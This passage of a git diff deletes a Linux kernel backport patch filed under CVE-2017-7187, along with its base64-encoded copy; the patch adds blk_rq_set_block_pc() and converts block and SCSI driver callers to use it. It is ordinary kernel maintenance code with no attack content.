-+ * blk_rq_set_block_pc - initialize a requeest to type BLOCK_PC
-+ * @rq:		request to be initialized
-+ *
-+ */
-+void blk_rq_set_block_pc(struct request *rq)
-+{
-+	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	rq->__data_len = 0;
-+	rq->__sector = (sector_t) -1;
-+	rq->bio = rq->biotail = NULL;
-+	memset(rq->__cmd, 0, sizeof(rq->__cmd));
-+	rq->cmd = rq->__cmd;
-+}
-+EXPORT_SYMBOL(blk_rq_set_block_pc);
-+
-+/**
-  * blk_requeue_request - put a request back on queue
-  * @q:		request queue where request should be inserted
-  * @rq:		request to be inserted
-diff --git a/block/bsg.c b/block/bsg.c
-index 76801e5..0ed26bc 100644
---- a/block/bsg.c
-+++ b/block/bsg.c
-@@ -196,7 +196,6 @@
- 	 * fill in request structure
- 	 */
- 	rq->cmd_len = hdr->request_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	rq->timeout = msecs_to_jiffies(hdr->timeout);
- 	if (!rq->timeout)
-@@ -273,6 +272,8 @@
- 	rq = blk_get_request(q, rw, GFP_KERNEL);
- 	if (!rq)
- 		return ERR_PTR(-ENOMEM);
-+	blk_rq_set_block_pc(rq);
-+
- 	ret = blk_fill_sgv4_hdr_rq(q, rq, hdr, bd, has_write_perm);
- 	if (ret)
- 		goto out;
-diff --git a/block/scsi_ioctl.c b/block/scsi_ioctl.c
-index 1b4988b..ddbcae2 100644
---- a/block/scsi_ioctl.c
-+++ b/block/scsi_ioctl.c
-@@ -233,7 +233,6 @@
- 	 * fill in request structure
- 	 */
- 	rq->cmd_len = hdr->cmd_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	rq->timeout = msecs_to_jiffies(hdr->timeout);
- 	if (!rq->timeout)
-@@ -314,6 +313,7 @@
- 	rq = blk_get_request(q, writing ? WRITE : READ, GFP_KERNEL);
- 	if (!rq)
- 		return -ENOMEM;
-+	blk_rq_set_block_pc(rq);
- 
- 	if (blk_fill_sghdr_rq(q, rq, hdr, mode)) {
- 		blk_put_request(rq);
-@@ -512,7 +512,7 @@
- 	memset(sense, 0, sizeof(sense));
- 	rq->sense = sense;
- 	rq->sense_len = 0;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(rq);
- 
- 	blk_execute_rq(q, disk, rq, 0);
- 
-@@ -544,7 +544,7 @@
- 	int err;
- 
- 	rq = blk_get_request(q, WRITE, __GFP_WAIT);
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(rq);
- 	rq->timeout = BLK_DEFAULT_SG_TIMEOUT;
- 	rq->cmd[0] = cmd;
- 	rq->cmd[4] = data;
-diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c
-index f5d0ea1..caddb5d 100644
---- a/drivers/block/pktcdvd.c
-+++ b/drivers/block/pktcdvd.c
-@@ -712,6 +712,7 @@
- 
- 	rq = blk_get_request(q, (cgc->data_direction == CGC_DATA_WRITE) ?
- 			     WRITE : READ, __GFP_WAIT);
-+	blk_rq_set_block_pc(rq);
- 
- 	if (cgc->buflen) {
- 		if (blk_rq_map_kern(q, rq, cgc->buffer, cgc->buflen, __GFP_WAIT))
-@@ -722,7 +723,6 @@
- 	memcpy(rq->cmd, cgc->cmd, CDROM_PACKET_SIZE);
- 
- 	rq->timeout = 60*HZ;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	if (cgc->quiet)
- 		rq->cmd_flags |= REQ_QUIET;
- 
-diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c
-index 8a3aff7..1ca0772 100644
---- a/drivers/cdrom/cdrom.c
-+++ b/drivers/cdrom/cdrom.c
-@@ -2165,6 +2165,7 @@
- 			ret = -ENOMEM;
- 			break;
- 		}
-+		blk_rq_set_block_pc(rq);
- 
- 		ret = blk_rq_map_user(q, rq, NULL, ubuf, len, GFP_KERNEL);
- 		if (ret) {
-@@ -2184,7 +2185,6 @@
- 		rq->cmd[9] = 0xf8;
- 
- 		rq->cmd_len = 12;
--		rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 		rq->timeout = 60 * HZ;
- 		bio = rq->bio;
- 
-diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
-index 68adb89..28bf7fb 100644
---- a/drivers/scsi/device_handler/scsi_dh_alua.c
-+++ b/drivers/scsi/device_handler/scsi_dh_alua.c
-@@ -120,6 +120,7 @@
- 			    "%s: blk_get_request failed\n", __func__);
- 		return NULL;
- 	}
-+	blk_rq_set_block_pc(rq);
- 
- 	if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- 		blk_put_request(rq);
-@@ -128,7 +129,6 @@
- 		return NULL;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->retries = ALUA_FAILOVER_RETRIES;
-diff --git a/drivers/scsi/device_handler/scsi_dh_emc.c b/drivers/scsi/device_handler/scsi_dh_emc.c
-index e1c8be0..6f07f7f 100644
---- a/drivers/scsi/device_handler/scsi_dh_emc.c
-+++ b/drivers/scsi/device_handler/scsi_dh_emc.c
-@@ -280,6 +280,7 @@
- 		return NULL;
- 	}
- 
-+	blk_rq_set_block_pc(rq);
- 	rq->cmd_len = COMMAND_SIZE(cmd);
- 	rq->cmd[0] = cmd;
- 
-@@ -304,7 +305,6 @@
- 		break;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->timeout = CLARIION_TIMEOUT;
-diff --git a/drivers/scsi/device_handler/scsi_dh_hp_sw.c b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-index 084062b..e9d9fea 100644
---- a/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-+++ b/drivers/scsi/device_handler/scsi_dh_hp_sw.c
-@@ -120,7 +120,7 @@
- 	if (!req)
- 		return SCSI_DH_RES_TEMP_UNAVAIL;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			  REQ_FAILFAST_DRIVER;
- 	req->cmd_len = COMMAND_SIZE(TEST_UNIT_READY);
-@@ -250,7 +250,7 @@
- 	if (!req)
- 		return SCSI_DH_RES_TEMP_UNAVAIL;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			  REQ_FAILFAST_DRIVER;
- 	req->cmd_len = COMMAND_SIZE(START_STOP);
-diff --git a/drivers/scsi/device_handler/scsi_dh_rdac.c b/drivers/scsi/device_handler/scsi_dh_rdac.c
-index 69c915a..3916c31 100644
---- a/drivers/scsi/device_handler/scsi_dh_rdac.c
-+++ b/drivers/scsi/device_handler/scsi_dh_rdac.c
-@@ -279,6 +279,7 @@
- 				"get_rdac_req: blk_get_request failed.\n");
- 		return NULL;
- 	}
-+	blk_rq_set_block_pc(rq);
- 
- 	if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) {
- 		blk_put_request(rq);
-@@ -287,7 +288,6 @@
- 		return NULL;
- 	}
- 
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 	rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT |
- 			 REQ_FAILFAST_DRIVER;
- 	rq->retries = RDAC_RETRIES;
-diff --git a/drivers/scsi/osd/osd_initiator.c b/drivers/scsi/osd/osd_initiator.c
-index aa66361..11bd87e 100644
---- a/drivers/scsi/osd/osd_initiator.c
-+++ b/drivers/scsi/osd/osd_initiator.c
-@@ -1570,6 +1570,7 @@
- 		if (unlikely(!req))
- 			return ERR_PTR(-ENOMEM);
- 
-+		blk_rq_set_block_pc(req);
- 		return req;
- 	}
- }
-@@ -1590,7 +1591,6 @@
- 	}
- 
- 	or->request = req;
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	req->timeout = or->timeout;
-@@ -1608,7 +1608,7 @@
- 				ret = PTR_ERR(req);
- 				goto out;
- 			}
--			req->cmd_type = REQ_TYPE_BLOCK_PC;
-+			blk_rq_set_block_pc(req);
- 			or->in.req = or->request->next_rq = req;
- 		}
- 	} else if (has_in)
-diff --git a/drivers/scsi/osst.c b/drivers/scsi/osst.c
-index 21883a2..0727ea7 100644
---- a/drivers/scsi/osst.c
-+++ b/drivers/scsi/osst.c
-@@ -365,7 +365,7 @@
- 	if (!req)
- 		return DRIVER_ERROR << 24;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	SRpnt->bio = NULL;
-diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
-index 3668b1b..c1e4a74 100644
---- a/drivers/scsi/scsi_error.c
-+++ b/drivers/scsi/scsi_error.c
-@@ -1653,6 +1653,8 @@
- 	 */
- 	req = blk_get_request(sdev->request_queue, READ, GFP_KERNEL);
- 
-+	blk_rq_set_block_pc(req);
-+
- 	req->cmd[0] = ALLOW_MEDIUM_REMOVAL;
- 	req->cmd[1] = 0;
- 	req->cmd[2] = 0;
-@@ -1662,7 +1664,6 @@
- 
- 	req->cmd_len = COMMAND_SIZE(req->cmd[0]);
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= REQ_QUIET;
- 	req->timeout = 10 * HZ;
- 	req->retries = 5;
-diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
-index 9f3168e..49076d1 100644
---- a/drivers/scsi/scsi_lib.c
-+++ b/drivers/scsi/scsi_lib.c
-@@ -238,6 +238,7 @@
- 	req = blk_get_request(sdev->request_queue, write, __GFP_WAIT);
- 	if (!req)
- 		return ret;
-+	blk_rq_set_block_pc(req);
- 
- 	if (bufflen &&	blk_rq_map_kern(sdev->request_queue, req,
- 					buffer, bufflen, __GFP_WAIT))
-@@ -249,7 +250,6 @@
- 	req->sense_len = 0;
- 	req->retries = retries;
- 	req->timeout = timeout;
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->cmd_flags |= flags | REQ_QUIET | REQ_PREEMPT;
- 
- 	/*
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index e059ad4..5170506 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -1656,10 +1656,9 @@
- 	if (!rq)
- 		return -ENOMEM;
- 
-+	blk_rq_set_block_pc(rq);
- 	memcpy(rq->cmd, cmd, hp->cmd_len);
--
- 	rq->cmd_len = hp->cmd_len;
--	rq->cmd_type = REQ_TYPE_BLOCK_PC;
- 
- 	srp->rq = rq;
- 	rq->end_io_data = srp;
-diff --git a/drivers/scsi/st.c b/drivers/scsi/st.c
-index 2a32036..7d74f83 100644
---- a/drivers/scsi/st.c
-+++ b/drivers/scsi/st.c
-@@ -484,7 +484,7 @@
- 	if (!req)
- 		return DRIVER_ERROR << 24;
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
-+	blk_rq_set_block_pc(req);
- 	req->cmd_flags |= REQ_QUIET;
- 
- 	mdata->null_mapped = 1;
-diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c
-index 244776b..dff91ee 100644
---- a/drivers/target/target_core_pscsi.c
-+++ b/drivers/target/target_core_pscsi.c
-@@ -1059,6 +1059,8 @@
- 			ret = TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
- 			goto fail;
- 		}
-+
-+		blk_rq_set_block_pc(req);
- 	} else {
- 		BUG_ON(!cmd->data_length);
- 
-@@ -1075,7 +1077,6 @@
- 		}
- 	}
- 
--	req->cmd_type = REQ_TYPE_BLOCK_PC;
- 	req->end_io = pscsi_req_done;
- 	req->end_io_data = cmd;
- 	req->cmd_len = scsi_command_size(pt->pscsi_cdb);
-diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
-index e9b04cd..cce84e5 100644
---- a/include/linux/blkdev.h
-+++ b/include/linux/blkdev.h
-@@ -742,6 +742,7 @@
- extern struct request *blk_get_request(struct request_queue *, int, gfp_t);
- extern struct request *blk_make_request(struct request_queue *, struct bio *,
- 					gfp_t);
-+extern void blk_rq_set_block_pc(struct request *);
- extern void blk_requeue_request(struct request_queue *, struct request *);
- extern int blk_reinsert_request(struct request_queue *q, struct request *rq);
- extern bool blk_reinsert_req_sup(struct request_queue *q);
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64
deleted file mode 100644
index 514d017e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA2MGViZDQ4MDYxOTQ5NDA1ZmU2YTY5YWE5MjFkNDdiNDBmNDc0YTQxIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBKZW5zIEF4Ym9lIDxheGJvZUBmYi5jb20+CkRhdGU6IEZyaSwgMDYgSnVuIDIwMTQgMDc6NTc6MzcgLTA2MDAKU3ViamVjdDogW1BBVENIXSBCQUNLUE9SVDogYmxvY2s6IGFkZCBibGtfcnFfc2V0X2Jsb2NrX3BjKCkKCldpdGggdGhlIG9wdGltaXphdGlvbnMgYXJvdW5kIG5vdCBjbGVhcmluZyB0aGUgZnVsbCByZXF1ZXN0IGF0IGFsbG9jCnRpbWUsIHdlIGFyZSBsZWF2aW5nIHNvbWUgb2YgdGhlIG5lZWRlZCBpbml0IGZvciBSRVFfVFlQRV9CTE9DS19QQwp1cCB0byB0aGUgdXNlciBhbGxvY2F0aW5nIHRoZSByZXF1ZXN0LgoKQWRkIGEgYmxrX3JxX3NldF9ibG9ja19wYygpIHRoYXQgc2V0cyB0aGUgY29tbWFuZCB0eXBlIHRvClJFUV9UWVBFX0JMT0NLX1BDLCBhbmQgcHJvcGVybHkgaW5pdGlhbGl6ZXMgdGhlIG1lbWJlcnMgYXNzb2NpYXRlZAp3aXRoIHRoaXMgdHlwZSBvZiByZXF1ZXN0LiBVcGRhdGUgY2FsbGVycyB0byB1c2UgdGhpcyBmdW5jdGlvbiBpbnN0ZWFkCm9mIG1hbmlwdWxhdGluZyBycS0+Y21kX3R5cGUgZGlyZWN0bHkuCgpJbmNsdWRlcyBmaXhlcyBmcm9tIENocmlzdG9waCBIZWxsd2lnIDxoY2hAbHN0LmRlPiBmb3IgbXkgaGFsZi1hc3NlZAphdHRlbXB0LgoKQ2hhbmdlLUlkOiBJZmMzODZkZmI5NTFjNWQ2YWRlYmY0OGZmMzgxMzVkZGEyOGU0YjFjZQpTaWduZWQtb2ZmLWJ5OiBKZW5zIEF4Ym9lIDxheGJvZUBmYi5jb20+Ci0tLQoKZGlmZiAtLWdpdCBhL2Jsb2NrL2Jsay1jb3JlLmMgYi9ibG9jay9ibGstY29yZS5jCmluZGV4IGJjZThkNzMuLjdjYjMxNTcgMTAwNjQ0Ci0tLSBhL2Jsb2NrL2Jsay1jb3JlLmMKKysrIGIvYmxvY2svYmxrLWNvcmUuYwpAQCAtMTE4OSw2ICsxMTg5LDggQEAKIAlpZiAodW5saWtlbHkoIXJxKSkKIAkJcmV0dXJuIEVSUl9QVFIoLUVOT01FTSk7CiAKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKwogCWZvcl9lYWNoX2JpbyhiaW8pIHsKIAkJc3RydWN0IGJpbyAqYm91bmNlX2JpbyA9IGJpbzsKIAkJaW50IHJldDsKQEAgLTEyMDYsNiArMTIwOCwyMiBAQAogRVhQT1JUX1NZTUJPTChibGtfbWFrZV9yZXF1ZXN0KTsKIAogLyoqCisgKiBibGtfcnFfc2V0X2Jsb2NrX3BjIC0gaW5pdGlhbGl6ZSBhIHJlcXVlZXN0IHRvIHR5cGUgQkxPQ0tfUEMKKyAqIEBycToJCXJlcXVlc3QgdG8gYmUgaW5pdGlhbGl6ZWQKKyAqCisgKi8KK3ZvaWQgYmxrX3JxX3NldF9ibG9ja19wYyhzdHJ1Y3QgcmVxdWVzdCAqcnEpCit7CisJcnEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CisJcnEtPl9fZGF0YV9sZW4gPSAwOworCXJxLT5fX3NlY3RvciA9IChzZWN0b3JfdCkgLTE7CisJcnEtPmJpbyA9IHJxLT5iaW90YWlsID0gTlVMTDsKKwltZW1zZXQocnEtPl9fY21kLCAwLCBzaXplb2YocnEtPl9fY21kKSk7CisJcnEtPmNtZCA9IHJxLT5fX2NtZDsKK30KK0VYUE9SVF9TWU1CT0woYmxrX3JxX3NldF9ibG9ja19wYyk7CisKKy8qKgogICogYmxrX3JlcXVldWVfcmVxdWVzdCAtIHB1dCBhIHJlcXVlc3QgYmFjayBvbiBxdWV1ZQogICogQHE6CQlyZXF1ZXN0IHF1ZXVlIHdoZXJlIHJlcXVlc3Qgc2hvdWxkIGJlIGluc2VydGVkCiAgKiBAcnE6CQlyZXF1ZXN0IHRvIGJlIGluc2VydGVkCmRpZmYgLS1naXQgYS9ibG9jay9ic2cuYyBiL2Jsb2NrL2JzZy5jCmluZGV4IDc2ODAxZTUuLjBlZDI2YmMgMTAwNjQ0Ci0tLSBhL2Jsb2NrL2JzZy5jCisrKyBiL2Jsb2NrL2JzZy5jCkBAIC0xOTYsNyArMTk2LDYgQEAKIAkgKiBmaWxsIGluIHJlcXVlc3Qgc3RydWN0dXJlCiAJICovCiAJcnEtPmNtZF9sZW4gPSBoZHItPnJlcXVlc3RfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCiAJcnEtPnRpbWVvdXQgPSBtc2Vjc190b19qaWZmaWVzKGhkci0+dGltZW91dCk7CiAJaWYgKCFycS0+dGltZW91dCkKQEAgLTI3Myw2ICsyNzIsOCBAQAogCXJxID0gYmxrX2dldF9yZXF1ZXN0KHEsIHJ3LCBHRlBfS0VSTkVMKTsKIAlpZiAoIXJxKQogCQlyZXR1cm4gRVJSX1BUUigtRU5PTUVNKTsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKwogCXJldCA9IGJsa19maWxsX3NndjRfaGRyX3JxKHEsIHJxLCBoZHIsIGJkLCBoYXNfd3JpdGVfcGVybSk7CiAJaWYgKHJldCkKIAkJZ290byBvdXQ7CmRpZmYgLS1naXQgYS9ibG9jay9zY3NpX2lvY3RsLmMgYi9ibG9jay9zY3NpX2lvY3RsLmMKaW5kZXggMWI0OTg4Yi4uZGRiY2FlMiAxMDA2NDQKLS0tIGEvYmxvY2svc2NzaV9pb2N0bC5jCisrKyBiL2Jsb2NrL3Njc2lfaW9jdGwuYwpAQCAtMjMzLDcgKzIzMyw2IEBACiAJICogZmlsbCBpbiByZXF1ZXN0IHN0cnVjdHVyZQogCSAqLwogCXJxLT5jbWRfbGVuID0gaGRyLT5jbWRfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCiAJcnEtPnRpbWVvdXQgPSBtc2Vjc190b19qaWZmaWVzKGhkci0+dGltZW91dCk7CiAJaWYgKCFycS0+dGltZW91dCkKQEAgLTMxNCw2ICszMTMsNyBAQAogCXJxID0gYmxrX2dldF9yZXF1ZXN0KHEsIHdyaXRpbmcgPyBXUklURSA6IFJFQUQsIEdGUF9LRVJORUwpOwogCWlmICghcnEpCiAJCXJldHVybiAtRU5PTUVNOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGJsa19maWxsX3NnaGRyX3JxKHEsIHJxLCBoZHIsIG1vZGUpKSB7CiAJCWJsa19wdXRfcmVxdWVzdChycSk7CkBAIC01MTIsNyArNTEyLDcgQEAKIAltZW1zZXQoc2Vuc2UsIDAsIHNpemVvZihzZW5zZSkpOwogCXJxLT5zZW5zZSA9IHNlbnNlOwogCXJxLT5zZW5zZV9sZW4gPSAwOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJYmxrX2V4ZWN1dGVfcnEocSwgZGlzaywgcnEsIDApOwogCkBAIC01NDQsNyArNTQ0LDcgQEAKIAlpbnQgZXJyOwogCiAJcnEgPSBibGtfZ2V0X3JlcXVlc3QocSwgV1JJVEUsIF9fR0ZQX1dBSVQpOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCXJxLT50aW1lb3V0ID0gQkxLX0RFRkFVTFRfU0dfVElNRU9VVDsKIAlycS0+Y21kWzBdID0gY21kOwogCXJxLT5jbWRbNF0gPSBkYXRhOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9ibG9jay9wa3RjZHZkLmMgYi9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYwppbmRleCBmNWQwZWExLi5jYWRkYjVkIDEwMDY0NAotLS0gYS9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYworKysgYi9kcml2ZXJzL2Jsb2NrL3BrdGNkdmQuYwpAQCAtNzEyLDYgKzcxMiw3IEBACiAKIAlycSA9IGJsa19nZXRfcmVxdWVzdChxLCAoY2djLT5kYXRhX2RpcmVjdGlvbiA9PSBDR0NfREFUQV9XUklURSkgPwogCQkJICAgICBXUklURSA6IFJFQUQsIF9fR0ZQX1dBSVQpOworCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGNnYy0+YnVmbGVuKSB7CiAJCWlmIChibGtfcnFfbWFwX2tlcm4ocSwgcnEsIGNnYy0+YnVmZmVyLCBjZ2MtPmJ1ZmxlbiwgX19HRlBfV0FJVCkpCkBAIC03MjIsNyArNzIzLDYgQEAKIAltZW1jcHkocnEtPmNtZCwgY2djLT5jbWQsIENEUk9NX1BBQ0tFVF9TSVpFKTsKIAogCXJxLT50aW1lb3V0ID0gNjAqSFo7Ci0JcnEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJaWYgKGNnYy0+cXVpZXQpCiAJCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCmRpZmYgLS1naXQgYS9kcml2ZXJzL2Nkcm9tL2Nkcm9tLmMgYi9kcml2ZXJzL2Nkcm9tL2Nkcm9tLmMKaW5kZXggOGEzYWZmNy4uMWNhMDc3MiAxMDA2NDQKLS0tIGEvZHJpdmVycy9jZHJvbS9jZHJvbS5jCisrKyBiL2RyaXZlcnMvY2Ryb20vY2Ryb20uYwpAQCAtMjE2NSw2ICsyMTY1LDcgQEAKIAkJCXJldCA9IC1FTk9NRU07CiAJCQlicmVhazsKIAkJfQorCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKIAogCQlyZXQgPSBibGtfcnFfbWFwX3VzZXIocSwgcnEsIE5VTEwsIHVidWYsIGxlbiwgR0ZQX0tFUk5FTCk7CiAJCWlmIChyZXQpIHsKQEAgLTIxODQsNyArMjE4NSw2IEBACiAJCXJxLT5jbWRbOV0gPSAweGY4OwogCiAJCXJxLT5jbWRfbGVuID0gMTI7Ci0JCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCQlycS0+dGltZW91dCA9IDYwICogSFo7CiAJCWJpbyA9IHJxLT5iaW87CiAKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2FsdWEuYyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2FsdWEuYwppbmRleCA2OGFkYjg5Li4yOGJmN2ZiIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9hbHVhLmMKKysrIGIvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfYWx1YS5jCkBAIC0xMjAsNiArMTIwLDcgQEAKIAkJCSAgICAiJXM6IGJsa19nZXRfcmVxdWVzdCBmYWlsZWRcbiIsIF9fZnVuY19fKTsKIAkJcmV0dXJuIE5VTEw7CiAJfQorCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCiAJaWYgKGJ1ZmxlbiAmJiBibGtfcnFfbWFwX2tlcm4ocSwgcnEsIGJ1ZmZlciwgYnVmbGVuLCBHRlBfTk9JTykpIHsKIAkJYmxrX3B1dF9yZXF1ZXN0KHJxKTsKQEAgLTEyOCw3ICsxMjksNiBAQAogCQlyZXR1cm4gTlVMTDsKIAl9CiAKLQlycS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKIAlycS0+Y21kX2ZsYWdzIHw9IFJFUV9GQUlMRkFTVF9ERVYgfCBSRVFfRkFJTEZBU1RfVFJBTlNQT1JUIHwKIAkJCSBSRVFfRkFJTEZBU1RfRFJJVkVSOwogCXJxLT5yZXRyaWVzID0gQUxVQV9GQUlMT1ZFUl9SRVRSSUVTOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfZW1jLmMgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYwppbmRleCBlMWM4YmUwLi42ZjA3ZjdmIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYworKysgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9lbWMuYwpAQCAtMjgwLDYgKzI4MCw3IEBACiAJCXJldHVybiBOVUxMOwogCX0KIAorCWJsa19ycV9zZXRfYmxvY2tfcGMocnEpOwogCXJxLT5jbWRfbGVuID0gQ09NTUFORF9TSVpFKGNtZCk7CiAJcnEtPmNtZFswXSA9IGNtZDsKIApAQCAtMzA0LDcgKzMwNSw2IEBACiAJCWJyZWFrOwogCX0KIAotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJIFJFUV9GQUlMRkFTVF9EUklWRVI7CiAJcnEtPnRpbWVvdXQgPSBDTEFSSUlPTl9USU1FT1VUOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfaHBfc3cuYyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX2hwX3N3LmMKaW5kZXggMDg0MDYyYi4uZTlkOWZlYSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfaHBfc3cuYworKysgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9ocF9zdy5jCkBAIC0xMjAsNyArMTIwLDcgQEAKIAlpZiAoIXJlcSkKIAkJcmV0dXJuIFNDU0lfREhfUkVTX1RFTVBfVU5BVkFJTDsKIAotCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJICBSRVFfRkFJTEZBU1RfRFJJVkVSOwogCXJlcS0+Y21kX2xlbiA9IENPTU1BTkRfU0laRShURVNUX1VOSVRfUkVBRFkpOwpAQCAtMjUwLDcgKzI1MCw3IEBACiAJaWYgKCFyZXEpCiAJCXJldHVybiBTQ1NJX0RIX1JFU19URU1QX1VOQVZBSUw7CiAKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOwogCXJlcS0+Y21kX2ZsYWdzIHw9IFJFUV9GQUlMRkFTVF9ERVYgfCBSRVFfRkFJTEZBU1RfVFJBTlNQT1JUIHwKIAkJCSAgUkVRX0ZBSUxGQVNUX0RSSVZFUjsKIAlyZXEtPmNtZF9sZW4gPSBDT01NQU5EX1NJWkUoU1RBUlRfU1RPUCk7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9yZGFjLmMgYi9kcml2ZXJzL3Njc2kvZGV2aWNlX2hhbmRsZXIvc2NzaV9kaF9yZGFjLmMKaW5kZXggNjljOTE1YS4uMzkxNmMzMSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL2RldmljZV9oYW5kbGVyL3Njc2lfZGhfcmRhYy5jCisrKyBiL2RyaXZlcnMvc2NzaS9kZXZpY2VfaGFuZGxlci9zY3NpX2RoX3JkYWMuYwpAQCAtMjc5LDYgKzI3OSw3IEBACiAJCQkJImdldF9yZGFjX3JlcTogYmxrX2dldF9yZXF1Z